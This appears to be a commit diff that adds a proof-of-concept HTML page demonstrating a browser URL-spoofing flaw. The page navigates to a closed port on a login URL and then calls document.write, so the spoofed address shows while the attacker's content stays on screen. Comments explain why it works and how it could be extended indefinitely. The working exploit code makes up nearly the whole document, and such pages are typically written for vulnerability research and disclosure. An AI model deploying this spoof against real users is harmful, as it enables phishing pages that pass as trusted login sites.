Create port-timeout test page
This commit is contained in:
parent
81c5d1c661
commit
7f23850f8a
|
@ -0,0 +1,45 @@
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<style>
|
||||||
|
html {
|
||||||
|
font-family: sans-serif;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<div id="contents">
|
||||||
|
<h1>URL Spoof due to port timeout</h1>
|
||||||
|
<h2>(+ using document.write to call onPageFinished with spoofed URL)</h2>
|
||||||
|
|
||||||
|
<input value="Test if page is interactive here" />
|
||||||
|
</div>
|
||||||
|
<script>
|
||||||
|
/** Main PoC logic **/
|
||||||
|
var canSpoof = false;
|
||||||
|
|
||||||
|
window.onbeforeunload = function () {
|
||||||
|
// Is set to true when we call window.location, meaning navigation has started
|
||||||
|
canSpoof = true;
|
||||||
|
}
|
||||||
|
|
||||||
|
setInterval(function () {
|
||||||
|
if (canSpoof) {
|
||||||
|
// document.write() call for some reason causes loading indicator to be hidden even if navigation is still being made to closed port
|
||||||
|
// This behavior allows us to spoof the URL since the loading indicator is not shown while the spoofed URL is shown in the address bar
|
||||||
|
canSpoof = false;
|
||||||
|
document.write(document.getElementById('contents').innerHTML + ' Spoof attempted');
|
||||||
|
//window.location = 'https://example.com:81/accounts/login?123';
|
||||||
|
//document.write('Observe how document.write calls onPageFinished in Android WV.');
|
||||||
|
}
|
||||||
|
}, 200);
|
||||||
|
|
||||||
|
setTimeout(function() {
|
||||||
|
window.location = 'https://example.com:81/accounts/login';
|
||||||
|
// In case the browser does show an error page when the connection timeout is reached, the attacker page can try re-navigating to the spoofed URL on another closed port.
|
||||||
|
// Re-navigating and writing again to the document will result in the same behavior, and extend indefinitely the time the attacker page is shown.
|
||||||
|
// However, for PoC, the connection timeout is long enough to demonstrate the vulnerability so it is not implemented.
|
||||||
|
}, 200);
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
Loading…
Reference in New Issue